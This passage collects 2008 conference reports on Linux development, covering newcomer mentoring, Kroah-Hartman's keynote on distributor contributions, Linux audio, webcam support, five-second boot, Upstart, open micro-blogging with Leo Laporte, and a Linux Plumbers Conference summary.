after being annoyed by one too many white space patches in his mailbox.  He
does not believe that encouraging people to blindly fix white space problems
is a good way to bring in new developers.  So the central question for this
session was: how can we do a better job of involving newcomers in the
kernel development process?

Linus asked that new developers not start by trying to fix warnings - a
task which currently appears on the "to do" list run by
the janitors project.  In the past, he has not enjoyed that experience at
all.  Beginner fixes for warnings tend to be aimed at silencing the warning
rather than really understanding what is going on; as a result, they often break
things.  A better place for people to start, he says, is by testing the kernel and
providing good bug reports.

Andi Kleen said that task lists can be useful.  He put together a document
on how to switch code over to the unlocked_ioctl() file operation,
thus eliminating the big kernel lock.  Some people made use of it and got
some useful work done.  Linus pointed out, though, that a certain Alan Cox
followed that document and got things wrong, forcing the developers to
revert his broken patch.

Matthew Wilcox stated that the problem in the kernel community is not a
shortage of patches - it's a shortage of review.  So he would rather start
new developers on tasks like bug reports.  Jeff Garzik noted that good
results can be had by encouraging new developers to acquire an obscure
piece of hardware and improve the driver.  That only works if one is
willing to put in a fair amount of mentoring time, though.

Mentoring is a subject that came around a few times.  Greg Kroah-Hartman's
Linux driver project work has provided a forum for mentoring, and that has
helped a number of developers to improve their skills.  But Dave Airlie
asked how many developers had been "mentored" into the system; almost no
hands were raised.  The thing that creates new kernel developers still
appears to be bugs that irritate people into fixing them.  That led to the
inevitable suggestion that the developers in the room should fix fewer
bugs, providing more opportunities for the recruiting of new developers.

Having prospective developers run regression tests was suggested, but was
not received with a great deal of enthusiasm.  Far better, said Linus, was
to have people test out as much hardware as they can; that's where the real
problems lie.

One often-cited problem with the janitors project is that it is not good at
graduating developers to bigger and better tasks.  Any sort of mentoring
effort should be oriented toward helping developers to grow while, at the
same time, having them do something useful at every step.

Andrew Morton - who was quieter than usual this year - noted that quite a
few people who express interest in kernel development disappear before too
long.  Putting effort into mentoring them can thus lead to a lot of wasted
time.  It is better, he said, to do this kind of mentoring in a group
situation.  There have been problems, though, with people posting incorrect
answers to questions on mailing lists, so group mentoring must be handled
carefully as well.

Andrew repeated his statement that the best thing for new developers to do
is to ensure that every system they have access to runs perfectly with
current kernels.

An attempt was made to get some action items out of the session.  The
creation of a mentoring project was suggested, but nobody stepped forward
to take that on.  There was a request for more distributors to package
testing kernels for users who would like to experiment with the leading
edge.  Al Viro, though, argued for a stronger emphasis on getting people to
read code, rather than write it.  That reading can take the form of code
review or simply taking the time to figure things out.

Linus would like a tool which could create a minimally useful kernel
configuration for a given system.  A full distributor configuration takes
far too long to build, and the prospect of creating a custom configuration
is increasingly daunting.  Linus noted that his first kernel for a new
system never works - he is certainly not unique in that regard.  It turns
out that such a tool exists; it will be dusted off and posted soon.

		LPC: Fitting into the kernel ecosystem


The first Linux Plumbers Conference started on September 17, 2008; the
opening talk was a keynote by Greg Kroah-Hartman.  He got the conference
going with with a provocative sermon on how the development ecosystem works
and the niche we all occupy within it.  It was a fun talk - unless you
happen to work for Canonical.

He started with an apology to Canonical, though.  In earlier talks, he had
said that only eight kernel patches had ever come from Canonical.  In fact,
he has been corrected; the proper number is 100.

So, Greg asked, why is he picking on Canonical?  His answer came in the
form of a table of contributors to the kernel.  It looked like this:


Then Greg asked: does anybody from Canonical want to say anything?  Nobody
did.


Moving on to the Linux ecosystem.  Greg put up a slide showing the larger
components of this ecosystem - the low-level stuff that makes Linux what it
is.  Some of the largest components, beyond the kernel, were GCC,
binutils, X.org, and the man pages distribution.  Looking at lines of
code, the kernel amounts to about 40% of the total.  Other large components
are all significantly smaller.

It turns out that Greg has been doing repository data mining in a number of
projects beyond the kernel.  So, for projects like GCC, X.org, and
binutils, he was able to put up tables listing the top contributors.  The
results varied somewhat, but there were a number recurring themes.  Red Hat
tends to be toward the top of the list on all of these projects; companies
like IBM and Novell also appear regularly.  CodeSourcery is a significant
contributor to GCC and binutils.  The U.S. National Security Agency
contributes 2.1% of the patches into X.org; why is not clear.
In all of these projects there are significant contributions from
unpaid developers, but those contributions are overshadowed by those from
paid developers.

And Canonical is always at the bottom of the chart - if it is there at all.

At this point Greg moved to a whiteboard to present his view of how the
community works.  At the development level, you have developers
contributing to projects, which then release the code.  There may be a few
users at that level who feed back information (and maybe patches), but, in
general, the biggest consumers of the project's releases are the
distributors.

Distributors package everything  and provide it to their users.  At this
point, another feedback loop comes into play: users feed their experiences
and problems back to the distributor.  Those distributors will respond to
the user feedback, improving their products.  The amount of feedback from
the distributors to the upstream projects varies, but it tends to be
small.  For enterprise distributions, it is quite small; they are running
ancient versions of everything and have little to do with current
upstream.  The community-oriented distributions, such as Fedora or
openSUSE, tend to feed more changes back to their upstream sources.

Then, there is the matter of redistributors who base their products on
another distributor's work; these are distributors like Ubuntu or CentOS.
There are no contributions back to the community from that kind of
distributor at all.  They are not functioning as a part of the Linux
ecosystem.


Greg finished up with what appears to be the message he came to the Linux
Plumbers Conference to deliver: if you are a developer, if you want to be a
part of the ecosystem, and if you work for a non-contributing company:
quit.  There are plenty of companies that understand the ecosystem and
which need good people; at least one company, it seems, had wanted to set
up a recruiting table at the conference.  It is a very good time for people
with community participation skills; there is no reason for anybody who
wants to work in the community to stay on the outside.


[As a postscript, it is amusing to note that, while the conference did not
allow companies to set up recruiting tables, nobody has prevented
prospective employers from filling a prominently-placed whiteboard with
information about available positions.]

		LPC: Linux audio: it's a mess


Audio is a fitting topic for the first day of the Linux  
Plumbers Conference. Users want sound to
Just Work, and there's lots of working code in
individual projects.  But so far, it seems like
nobody has everything quite plumbed together in an
annoyance-free way.
Lennart
Poettering, a lead  
developer of PulseAudio and Red Hat employee,
moderated the miniconference and started with a
summary of the state of Linux audio: "it's a mess."
The audio miniconference came up with two steps
toward cleaning up the mess, though.  First, come up
with a coherent story for application developers on
what sound API to use, and how.  Second, clean up the
often-confusing array of user-visible audio level controls.
PulseAudio first appeared to regular users
in
Fedora, starting with version 8, and now,
as Lennart puts it, is for up-to-date users,
"the software that currently breaks your audio."
PulseAudio is a sound server that mixes audio from
multiple applications and passes it along to the
sound hardware. It offers advanced features such
as network transparency: an application can play a
sound on a remote system, and PulseAudio makes it
come out the speakers on the remote machine where
the user is working.  Supporting it shouldn't
be a big change for most application developers
to handle.  It will handle applications written
to the kernel's maintained audio API, ALSA,  using the  
PulseAudio backend for alsa-lib.  So the
PulseAudio transition has been relatively painless
for the distributions.
An earlier sound server project, the Enlightened  
Sound Daemon (ESD) sound
server, is falling out of favor and Media  
Application Server (MAS) has never really caught
on. However, one of the competing sound servers looks likely
to remain.  On the pro audio side, the low-latency
sound server JACK
is the recommended option.  JACK, the "Jack Audio
Connection Kit," as Dave Phillips writes, "holds  
the keys to the kingdom" for connecting
studio applications such as the Ardour  
digital audio workstation and the Rosegarden  
MIDI sequencer.  "If you want all of the features,
no one audio system supports all of them," Lennart
said.
Apple and Microsoft each have a single sound server
that does both desktop and pro audio, but nobody at
the session seemed to have much interest in that
direction for Linux.  PulseAudio is optimized for
general desktop use and power savings, and supports
scheduling features that should minimize wakeups but
still allow for reasonably low-latency playback of
streaming audio.  It's also
network-transparent and supports features such as
placing desktop sound events based on mouse position.
Network audio and desktop effects don't tempt pro
audio users.  JACK's uncompromising approach toward
latency means it's likely to hog too much power to
be acceptable to battery-life-watching desktop users,
but fine for a studio with a rack full of gear.  So two
sound servers, one for pro and one for the masses, seems
to be fine with both sets of users.
Abusing ALSA
PulseAudio, however, can't give applications direct
access to the hardware, and currently only about 70%
of ALSA applications use the API in a PulseAudio-safe
way, Lennart said.  Some high-profile applications
are among those doing audio wrong.  "Flash and
Skype are really really broken applications,
especially Flash," he said.  Adobe split out the
parts of its code that talk to the audio subsystem,
and certain other plumbing, into an open-source
library, libflashsupport.  But Flash remains broken.
The proprietary Flash library talks to libflashsupport
from multiple threads, and one thread calls a
destructor while another continues to send data.
"It works until you close the browser window and then
you get a race,"  Lennart said.
Developers who want to play audio have a
sometimes-confusing choice of tools, including PortAudio and  
GStreamer.
(PortAudio is cross-platform, which is likely why
the popular cross-platform audio editing application
Audacity uses it.)  GStreamer is relatively
feature-intense and heavyweight, also handling
video and transcoding.  (Write a player with
Gstreamer and you get the ability to play your
collection of C64 SID files for free.)

[PULL QUOTE: 
If someone comes and says, 'I want to
write an audio application. Which API should
I use?' I don't have a good answer
 END QUOTE]

"If someone comes and says, 'I want to
write an audio application. Which API should
I use?' I don't have a good answer," Lennart
said.  The current best answer seems to be to
write to the PulseAudio-safe subset of ALSA.
Jeff Licquia
of the Linux Standard Base (LSB), in the audience,
mentioned that ALSA is on track for inclusion
in LSB 4.0, and is a trial use module for 3.2.
LSB aims to define a compatibility standard for
Linux applications, and aims to do the kind of
application developer education that Linux audio
developers seem to need.  Applications seeking LSB
certification must run all of the LSB tests, but can
fail anything tagged as trial use.  "We're only keeping
the stuff that we hope will be around for the long
term," he said.  If the LSB-safe subset of ALSA fits
into the PulseAudio-safe subset of ALSA, application
developers could write to ALSA and test with LSB.
"I would like to be able to tell people to use libsydney," 
Lennart said.  Libsydney, in  
progress, is intended to be a networking-friendly
general-purpose audio API.
ALSA and the HD-Audio widget problem
In ALSA, the hardware/software interface is in
good shape, but software to user interface needs some work.  Takashi
Iwai, a core ALSA developer and Novell
employee, pointed out in a talk that the line
count for /sound code in the kernel is actually
shrinking, except for ASoC (system on a chip)
and HD-audio.  "There will be no more sound cards,
especially PCI," he said.  The one exception is the
SoundBlaster X-FI for gamers, which is currently
not supported well in ALSA.  Creative announced proprietary  
drivers in 2006, but one ALSA developer recently
did get access to a data sheet under NDA.  
The new audio standard, HD-Audio, is commonly
found on new systems, and it's well-supported at the
kernel level.  However, it's based on "widgets" with
vendor-configurable I/O pins.  A driver can't tell
how the HD-Audio part is connected, so some Linux
plumbing work is required to identify which of the
many exposed level controls is the right one to show
the user.  An audience member pointed out the need
to tweak multiple level settings on his hardware,
to get the right level without distortion.
Linux will need more information on how each
machine has its HD-Audio hardware hooked up in order
to reliably give the user a useful volume control.

		Leo Laporte on open micro-blogging


  Radio talk show and podcast host Leo
  Laporte doesn't think operating systems or network infrastructures should
  ever be proprietary. He's the host of The Tech
  Guy radio show, which airs every weekend on stations around the United
  States, and of FLOSS Weekly, a regular
  podcast in which Laporte discusses different aspects of the Free, Libre, and
  Open Source software community. On The Tech Guy show, Laporte answers
  questions from computer users who call in to get advice and find ways to make
  their computers run better. Most of his callers are Windows users, but
  Laporte usually
  finds a 
  way to mention Linux and other open source software during the course of his
  show. 


  Laporte says he has been writing software for decades, and that he has always
  shared the source code, even before he had a notion of open
  source. "It was 
  public domain then. But even then, I understood that if you're programming,
  the most interesting part is to see other people's code and be able to modify
  it. That's just a natural way to work." His first shot at
  installing Linux was 
  back in 1994 when he got his hands on a copy of Slackware. "It was
  murder — 
  but it opened my eyes to the growing open source world."


  At the time, Laporte was the host of a cable television show called Tech TV.
  "We were the first television show to install Linux live."
  On that show, 
  Laporte hosted some of the biggest names in FLOSS, including Linus Torvalds
  and Richard Stallman, during Tech TV's run. "The longer I worked as a computer
  journalist, the more obvious it became to me that proprietary software is a
  bad idea. It's not natural to be secretive and it doesn't make sense." Laporte
  says that especially in the enterprise, the technological infrastructure
  should be open. "That should never be proprietary. Protocols, standards, and
  code need to be open."


  When it comes to applications, Laporte is a bit more flexible. "If you want to
  write an app that is closed source, I can see there are reasons why one might
  want to do that and that's fine with me. But closing the operating system
  makes no sense, and it is bad for everybody."


  Laporte, a Twitter user with over
  fifty-five thousand followers, recently announced he would no longer use
  Twitter, but would instead now throw his support behind
  Laconica, the open source micro-blogging
  platform on which Identi.ca is built. Laporte
  spoke extensively about Laconica on FLOSS Weekly last month when he chatted
  with Evan Prodromou, the original
  author of Laconica and the person who maintains identi.ca.


  "Laconica is identical to Twitter, but it's open, which is huge,
  and, more than open just in terms of it being open source."
  Laporte 
  says open standards are just as important in this case, and that the protocols
  for micro-blogging should become commoditized so that others can build
  on top of the infrastructure instead of having to start from
  scratch. Laconica also offers users the option to release all their
  micro-posts under a Creative Commons attribution license, making the service
  about as "open as you could hope for," writes Dan Brickley, co-founder of the
  Friend of a Friend project (FOAF).


  With Laconica, different micro-blogging services can communicate with each
  other since the platform is open, unlike Twitter's service. This makes it
  possible for different communities to form their own branded services in which
  users can still search for and follow users in other communities, tying them
  together in what has become known as a "federation." Right now, Laconica is
  running on
  dozens
  of disparate servers, whose users can all subscribe to each others'
  updates. Laconica is built using the
  OpenMicroBlogging
  specification, which is completely open, free, and independent of any one
  central maintenance authority, unlike Twitter's proprietary protocol.


  Laporte believes that this kind of federation, which could be called
  distributed micro-blogging, is the key to overcoming scalability issues that
  have plagued Twitter, resulting in frequent outages for the popular service.
  "If you can't scale, that's another reason to have a more
  distributed system. Maybe we shouldn't have two million people on one
  Twitter. Maybe we 
  should have five thousand people on four hundred 'twitters.' I have three
  thousand people on my system, and that's just about right."


  Laporte's system is called the TWiT
  Army, [Note that the web site is currently down]
  named after another of his podcasts known as This
  Week in Tech, or TWiT. "The conversation [there] has been very
  cohesive. The conversation is with people you know. With Twitter, it
  turns into a broadcast medium instead of a conversation. Now, it is a very
  useful way to get a message out to all those people. But I would love to have
  all those people all in their own communities, able to search across the
  federation by keyword, and if I post something of interest they'll find out
  about it."


  Laporte says he is not trying to go "head to head" against Twitter. But he is
  convinced that Laconica is a better way to do micro-blogging.  "One of my
  problems with Twitter is that I contribute a lot of content and they shut down
  access to it. I want to be part of an open platform — that's where the
  innovation is going to occur."


  Laporte says that features Twitter previously offered but has shut down,
  including instant messaging and
  "track," are
  two of the most valuable features that Twitter offered. "Comcast realized a
  huge value from Track," he says. Comcast customer service agents were tracking
  Twitter posts to monitor complaints or issues posted by users, and then
  following up directly with those people. "Twitter was saying, 'well it's too
  demanding,' but the conspiracy theory is that they realize this is where the
  real value of Twitter is and they want to try to monetize it." With Laconica,
  Laporte says, these types of features can remain open and accessible, not
  subject to the whims of proprietary ownership.


  Laporte, Prodromou, and others including RSS pioneer
  Dave Winer, are talking about a
  collaborative effort to standardize and open the protocols for micro-blogging.
  The group is planning a
  conference
  for all who are interested in the concept of open micro-blogging, called the
  BearhugCamp. Laporte says, "we would very much like to
  encourage Twitter to become a part. The idea is to get all the
  players to the table and encourage them to support the
  Extensible Messaging and Presence Protocol
  (XMPP) (developed by Jabber). We're creating
  a new messaging medium with emerging open standards, in new and exciting ways.
  It's not really about Twitter at all – Twitter gave us this idea of
  micro-blogging, and now we're onto the next thing: let's make it open."


		LPC: What's happening with webcams


Christmas is coming early for webcam
users.  Support for hundreds of popular
webcams, available from Michel Xhaard's GSPCA project,  
is merged
for inclusion in the upcoming 2.6.27 kernel.
The amount of tweaking required from the user, the
distribution, or both, has been cut, and it's likely
that a random webcam will now just work out of the
box.  

Even with the much-wanted drivers
becoming part of mainstream Linux, a small
matter of plumbing remains.  Webcams, Hans  
de Goede pointed out at the Linux
Plumbers Conference, produce a variety of
compressed video data.  "They all came up
with interesting proprietary compressed video
formats," he says.  The out-of-tree version of
GSPCA did some decoding in kernel space, but the  
decoding of many camera-specific custom video
formats had to be ripped out, as doing
that kind of work in-kernel is a Linux faux
pas.  That's where Hans's libv4l comes in.  Announced  
in June, the new library (actually a set of three)
does the format conversion.
While not a Red Hat employee
at the time (he is now) Hans posted a "BetterWebcamSupport"  
feature idea on the Fedora wiki, writing, "Currently
many webcams do not work with Fedora out of the box
even though a Linux driver exists for them."  The
problem was partly fixed with the GSPCA cleanup and
inclusion upstream, and partly became the rationale
for libv4l.  Besides the core libv4lconvert library,
the package includes libv4l2, to emulate a /dev/videoX
device which, transparently to the application,
will deliver "sane" video formats.  There's also a
libv4l1 to do the same thing but for the V4L1 API.
An audience member asked why the library
is separate from gstreamer, which is already
set up for video transcoding.  V4L2 developer Hans  
Verkuil responded from the audience that "it's
something that you do not want to have in the kernel,
but it has to be small and fast."  That leaves out
gstreamer as a general solution, since some webcam
applications don't need gstreamer or can't afford
the space it takes.  Therefore, a separate library.
It needs one more feature, too: vendors install
camera chips however they'll fit, which means the
same camera module could be right side up on one
product and upside down on another.  Therefore,
libv4l has software support for flipping images,
but it still needs the data to know when to flip:
a table identifying which hardware has the camera
module in which orientation.
Brandon Philips
at SUSE has another piece of the puzzle,
a "frame server" that lets multiple
applications share the webcam—doing
for the webcam what PulseAudio does for the
sound hardware.  You can't shoot a photo with Cheese  
while another app has the webcam open, as he showed in
a screenshot.
You can always rely on the computer hardware
industry to figure out ways to save a little money
on something if it's possible to solve the problem
in software.  Many new webcams have motorized focus
but no hardware autofocus.  Autofocus is up to the
host system—which means a focusing daemon needs
to see the video at the same time as an end-user
application. So providing access for the autofocus
daemon is another reason for the frame server.
Someone on the mailing list has the autofocus math
that will form the guts of the daemon figured out,
but it's a fairly intensive calculation and will
need to be done on an occasional frame of video,
not each frame.
While the original frame server idea would have
one shared memory segment per system, with access
for multiple users, PulseAudio developer Lennart
Poettering pointed out the potential security risks
of that idea from the audience.  "Memory mapping
across privileges is a really bad idea,"  he said.
He suggested putting the frame server in the user
session to prevent users from, at least, killing each
other's webcam applications.

The webcam market is one where Linux is an
afterthought if it's a thought at all.  The Linux
conferences aren't teeming with employees of webcam
manufacturers.  The support Linux does have shows
that the community can still support hardware on its
own when it has to.


		LPC: Booting Linux in five seconds


At the Linux Plumbers Conference Thursday,
Arjan van de
Ven, Linux developer at Intel and author of
PowerTOP, and Auke Kok, another Linux developer at
Intel's Open
Source Technology Center, demonstrated a Linux
system booting in five seconds.  The hardware was
an Asus EEE PC, which has solid-state storage,
and the two developers beat the five second
mark with two software loads: one modified Fedora and one  
modified Moblin.
They had to hold up the EEE PC for the audience,
since the time required to finish booting was less
than the time needed for the projector to sync.
How did they do it?  Arjan said it starts with
the right attitude.  "It's not about booting faster,
it's about booting in 5 seconds."  Instead of saving
a second here and there, set a time budget for the
whole system, and make each step of the boot finish
in its allotted time.  And no cheating.  "Done booting
means CPU and disk idle," Arjan said.  No fair putting
up the desktop while still starting services behind
the scenes.  (An audience member pointed out that
Microsoft does this.)  The "done booting" time did
not include bringing up the network, but did include
starting NetworkManager.  A system with a conventional
hard disk will have to take longer to start up: Arjan
said he has run the same load on a ThinkPad and achieved
a 10-second boot time.
Out of the box, Fedora takes
45 seconds from power on to GDM  
login screen.  A tool called Bootchart,  
by Ziga Mahkovec, offers some details.  In a
Bootchart graph of the Fedora boot (fig. 1), the
system does some apparently time-wasting things.
It spends a full second starting the loopback
device—checking to see if all the network
interfaces on the system are loopback.  Then there's
two seconds to start "sendmail."  "Everybody pays
because someone else wants to run a mail server,"
Arjan said, and suggested that for the common
laptop use case—an SMTP server used only
for outgoing mail—the user can simply run ssmtp.

Another time-consuming process
on Fedora was "setroubleshootd," a useful  
tool for finding problems with Security Enhanced
Linux (SELinux) configuration.  It took five seconds.
Fedora was not to blame for everything.  Some upstream
projects had puzzling delays as well.  The X Window
System runs the C preprocessor and compiler on
startup, in order to build its keyboard mappings.
Ubuntu's boot time is about the same: two
seconds shorter (fig. 2).  It spends 12 seconds running
modprobe running a shell running modprobe, which
ends up loading a single module.  The tool for adding
license-restricted drivers takes 2.5 seconds—on
a system with no restricted drivers needed.
"Everybody else pays for the binary driver," Arjan
said.  And Ubuntu's GDM takes another 2.5 seconds of
pure CPU time, to display the background image.

Both distributions use splash screens.  Arjan and
Auke agreed, "We hate splash screens.  By the time
you see it, we want to be done."  The development
time that distributions spend on splash screens is
much more than the Intel team spent on booting fast
enough not to need one.
How they did it: the kernel
Step one was to make the budget.  The kernel
gets one second to start, including all modules.
"Early boot" including init scripts and background
tasks, gets another second.  X gets another second,
and the desktop environment gets two.
The kernel has to be built without initrd, which
takes half a second with nothing in it.  So all
modules required for boot must be built into the
kernel.  "With a handful of modules you cover 95% of
laptops out there," Arjan said.  He suggested building
an initrd-based image to cover the remaining 5%.
Some kernel work made it possible to do
asynchronous initialization of some subsystems.
For example, the modified kernel starts the Advanced
Host Controller Interface (AHCI) initialization,
to handle storage, at the same time as the Universal
Host Controller Interface (UHCI), in order to handle
USB (fig.3).  "We can boot the kernel probably in
half a second but we got it down to a second and we
stopped," Arjan said.  The kernel should be down to
half a second by 2.6.28, thanks to a brand-new fix
in the AHCI support, he added.

One more kernel change was a small patch to support
readahead.  The kernel now keeps track of which blocks
it has to read at boot, then makes that information
available to userspace when booting is complete.
That enables readahead, which is part of the early
boot process.
How they did it: readahead and init
Fedora uses Upstart  
as a replacement for the historic "init" that
traditionally is the first userspace program to run.
But the Intel team went back to the original init.
The order of tasks that init handles is modified
to do three things at the same time: first, an
"sReadahead" process, to read blocks from
disk so that they're cached in memory, second,
the critical path: filesystem check, then the D-Bus  
inter-process communication system,
then X, then the desktop.  And the
third set of programs to start is the Hardware  
Abstraction Layer (HAL), then the udev  
manager for hot-plugged devices, then networking.
udev is used only to support devices that might
be added later—the system has a persistent,
old-school /dev directory so that boot doesn't depend
on udev.
The arrangement of tasks helps get efficient use
out of the CPU.  For example, X delays for about
half a second probing for video modes, and that's
when HAL does its CPU-intensive startup (fig. 4).

In a graph of disk and CPU use, both are
at maximum for most of the boot time, thanks
to sReadahead.  When X starts, it never has to
wait to read from disk, since everything it needs
is already in cache.  sReadahead is based on Fedora Readahead,
but is modified to take advantage of
the kernel's new list of blocks read.
sReadahead is to be released next week on moblin.org,  
and the kernel patch is intended for mainline as
soon as Arjan can go over it with ext3 filesystem
maintainer Ted Ts'o.  (Ted, in the audience, offered
some suggestions for reordering blocks on disk to
speed boot even further.)
There's a hard limit of 75MB of reads in order
to boot, set by the maximum transfer speed of the
Flash storage:  3 seconds of I/O at 25MB/s.  So,
"We don't read the whole file. We read only the
pieces of the file we actually use," Arjan said.
sReadahead uses the "idle" I/O scheduler, so that if
anything else needs the disk it gets it.  
With readahead turned off, the system boots in seven
seconds, but with readahead, it meets the target of five.
X is still problematic.  "We had to do a lot
of damage to X," Arjan said.  Some of the work
involved eliminating the C compiler run by re-using
keyboard mappings, but other work was more temporary.
The current line of X development, though, puts more
of the hardware detection and configuration into the
kernel, which should cut the total startup time.
Since part of the kernel's time budget is already
spent waiting for hardware to initialize, and it
can initialize more than one thing at a time, it's
a more efficient use of time to have the kernel
initialize the video hardware at the same time it
does USB and ATA.  X developer Keith Packard, in the
audience and also an Intel employee, offered help.
Setting the video mode in the kernel would not
let the kernel initialize it at the same time as
the rest of the hardware, as shown in figure 3.
The fast-booting system does not use GDM but boots
straight to a user session, running the XFCE desktop
environment.  Instead of GDM, Arjan said later,
a distribution could boot to the desktop session of
the last user, but start the screensaver right away.
If a different user wanted to log in, he or she could
use the screensaver's "switch user" button.

In conclusion, Arjan said, "Don't settle for 'make
boot faster.'  It's the wrong question.  The question
is 'make boot fast'."  And don't make all users wait
because a few people run a filesystem that requires
a module or sendmail on their laptops.  "Make it
so you only pay the price if you use the feature."
Distributions shouldn't have to maintain separate
initrd-based and initrd-free kernel packages, he said
later.  The kernel could try to boot initrd-free,
then fall back if for whatever reason it couldn't
see /sbin/init, as might happen if it's missing the
module needed to mount the root filesystem.
PowerTOP spawned a flurry of power-saving hacks
from all areas of the Linux software scene.  The
combination of Bootchart, readahead, and a five-second
target looks likely to set off a friendly boot time
contest among Linux people as well.  At the conference
roundup Friday, speaker Kyle McMartin announced that
both Fedora and Ubuntu have fixed some delays in
their boot process, and there was much applause.


FIGURE CREDIT: Arjan van de Ven and Auke Kok, Intel

		LPC: Upstart 1.0 plans: manifesto for a new init


Let's make two things clear about Upstart,  
a proposed replacement for the Linux "init" process.
First, it's not there to speed up boot, and second,
it's not intended to parallelize startup.  "Upstart is
not for what most people think it is for," said its
author, Scott James
Remnant, in a talk in the dbus miniconference at
the Linux Plumbers Conference.  What it is there for
is to expand the capabilities of "init" on Linux,
replace some scripts and workarounds with rules
that are intended to be easier to understand and
modify, and enable future improvements.  Remnant is
a Canonical employee, and Upstart is in Fedora
as of version 9, making it a welcome example of a
Canonical-sponsored project finding its way into
other distributions.
While Greg  
Kroah-Hartman mentioned a list of core software on the
Linux platform in his Plumbers Conference talk,
"the one thing he never put in there was init,"
Remnant said.  The Linux init, originally by Miquel
van Smoorenburg,  has been unchanged for years, and
is modeled on the System V Unix init, which is even
older.  Instead of updating it, Remnant says that, for
too long, distributions have just worked around it.
The startup process has traditionally consisted
of shell scripts, started by init, but containing
workarounds and extensions accumulated over the years.
For example, Debian has a wrapper program called
start-stop-daemon, that manages PID files, to keep
track of what process ID a daemon process ends up with.
Upstart handles that itself.
Current features of upstart include sending
notifications for system events, for example, when a
service starts; eliminating race conditions, by
offering dependency tracking; and removing some
service startups from the critical path for boot,
again by handling dependencies.  Upstart allows a
distribution or sysadmin to spell out the critical
path in a script, and also specify dependencies.
Tracking dependencies allows distributions to
eliminate "sleep" loops from the boot sequence, and
instead take actions based on events.  


Events are
not limited to the runlevel changes familiar to
sysvinit users, but can depend on other things on
the system.   But what other things?  
Future directions for Upstart could be ambitious.
For 1.0, Remnant is considering adding the
ability to do tasks based on cron-like criteria
such as "hourly."  But should upstart really replace
cron?
Another possibly useful direction would be an "idle"
event.  The Common Unix Printing System (CUPS) is a
service that makes sense to start "30 seconds before
the user thinks of clicking on the print button,"
he said.  CUPS is not in the critical path for boot,
but needs to be running to detect printers before
the user needs them.  Should it be possible to start
non-critical services when the system becomes idle?
Even though fast boot isn't the goal of upstart,
Remnant is optimistic about being able to help.
Some of the slow booting problems that Arjan van de
Ven and Auke Kok identified at the conference are deep
in the weeds of nested scripts, and might be smoked
out by a simpler init layout.  "To make boot fast we
have to do a bunch of different stuff.  it makes it
easy for us to do the real work," Remnant said.

		The Linux Plumbers Conference: a summary


Back in the early days of Linux, a developer wishing to meet his or her
peers at a conference had a relatively small number of alternatives.  Two
of those - Linux Expo and the Atlanta Linux Showcase - were held in the
United States.  But it has been a long time since the US has hosted a
serious developer-oriented conference - especially for developers who are
working on the lower layers of the system.  The US-based conferences died
out as a result of a combination of a number of factors, including poor
management, competition from the 
Ottawa Linux Symposium and (yes, really) LinuxWorld, and a feeling among
certain developers that becoming the next Dmitry Sklyarov would not be a
fun way to spend the rest of the year.

There is a certain appeal to overseas events, but that appeal fades more
quickly than one might expect.  The need for long-haul travel also excludes
US-based developers who are unable to arrange funding.  So, for some years,


the development community in the US has been wishing for a local
conference.  More recently, a dedicated group of Portland-based developers
led by Kristen Carlson Accardi,
with some help from the Linux Foundation, decided to do something about
it.  The result was the first edition of the Linux Plumbers Conference,
held September 17 to 19.  Staging this conference in a world
which does not lack for conferences was a bit of a risk, and the organizers
added a few risks of their own to the mix.  Looking back, your editor can
say that those risks were well repaid; the first Linux Plumbers Conference
was a great success.


The "plumbing" focus of this event was well chosen.  While it is still
possible to run a system with a bare kernel and a shell as the
init process, Linux systems used for real work increasingly have a
layer of user-space software tightly wrapped around the kernel.  Quite a
bit of kernel-based functionality only works properly in the presence of a
tightly-coupled user-space component; examples include system
initialization, 3D graphics, and much more.  The kernel, along with its
collection of user-space software, makes up the "plumbing" layer which
makes everything else work.  Kernel developers have had ample opportunities
to get together in recent years, but there has been no concerted effort to
bring together the developers for the full plumbing layer until now.


The other significant change made by the LPC organizers was to do away with
the "everybody delivers a paper" format used by most conferences.  Instead,
the conference was planned as a series of 2.5-hour "microconferences," each
with a specific focus.  Each microconference, which had its own "runner,"
was able to select its own mode of operation.  They generally included a
certain number of presentations on relevant topics; in this sense, the
microconferences resemble the topic-specific tracks found at many academic
gatherings. 


Where things differ, though, is that most of the microconferences were explicitly
oriented toward discussion and problem solving.  The best speakers did not
(just) talk about their own project; they raised challenges for the group
as a whole to address.  It worked spectacularly well.  Throughout the
event, your editor saw rooms full of people who were fully engaged in the
work at hand.  The discussions had wide participation, most of the necessary
people were generally in the room, and there were relatively few bored
people checking email.  And, most importantly, a lot of real work got
done.  Developers came out of the sessions with a clear idea of what needs
to be done, agreement with others on how it was to be done, and, sometimes,
working code.

So, what did all of these developers talk about?


 Developers interested in storage talked about the iogrind tool and a
     number of outstanding problems; some
     notes from the session have been posted.

 The Audio microconference covered a wide range of issues; see this LWN article for a
     summary.

 A session on tracing saw presentations by developers of a number of
     competing technologies, followed by a focused effort to design a
     unified low-level shared relay buffer.

 The video input session, for all practical purposes, continued on and
     off through the entire conference; that group of developers, which had
     never met before, set in motion some major redesign efforts for the
     Video4Linux layer.

 The bootstrap and initialization session was dominated by Arjan van de
     Ven's five-second boot
     demonstration; having been given that challenge, developers from
     multiple distributions set about the
     task of getting their systems to      boot quickly.

 A session on server management looked for solutions to a number of
     challenges facing Linux administrators.

 Kernel/user-space APIs were the topic of another lively session which,
     while perhaps concluding little, raised a lot of issues on how those
     APIs should be designed.

 The power management session concluded that the suspend/resume problem
     is solved ("if you disagree, you bought the wrong hardware") and made
     progress on a number of other problems; now, they say, all that is
     left is the coding.

 The "future displays" session pounded out the path toward kernel-based
     graphics mode setting and quite a bit more.

 And the desktop integration session, while reaching "not a lot of
     conclusions," examined a number of relevant issues; the discussion on
     Upstart from that session will be covered here separately.


Beyond that, LPC attendees could choose from a handful of more traditional
presentations, a provocative
keynote from Greg Kroah-Hartman, a rather less provocative kernel


update from your editor, a git tutorial taught by some guy named Linus, and
no shortage of evening celebrations.  All told, the Linux Plumbers
Conference was one of the most productive, interesting, and generally
worthwhile events your editor has been to in quite some time - and your
editor has been to rather more than the usual number of events.  There will
be a lot of interesting developments kicked off by this gathering, once the
exhausted attendees get some rest.  This conference is off to a good start.


And it is just a start; the organizers are already working on the 2009
edition.  It will, once again, be held in Portland.  The general format
will likely remain the same, but there will be no kernel summit before the
2009 event (the summit will be in October 2009 in Tokyo).  Instead, there
is a reasonable chance that a more traditional, presentation-oriented
conference will be planned to coincide with the 2009 Plumbers Conference.
With this new event, the active local community, and the success of this
year's conference, LPC2009 looks promising already.


After 2009, the Plumbers team hopes to take a page from the linux.conf.au
playbook and pass the event onto a new set of volunteer organizers
somewhere else in North America.  This form of organization has helped to
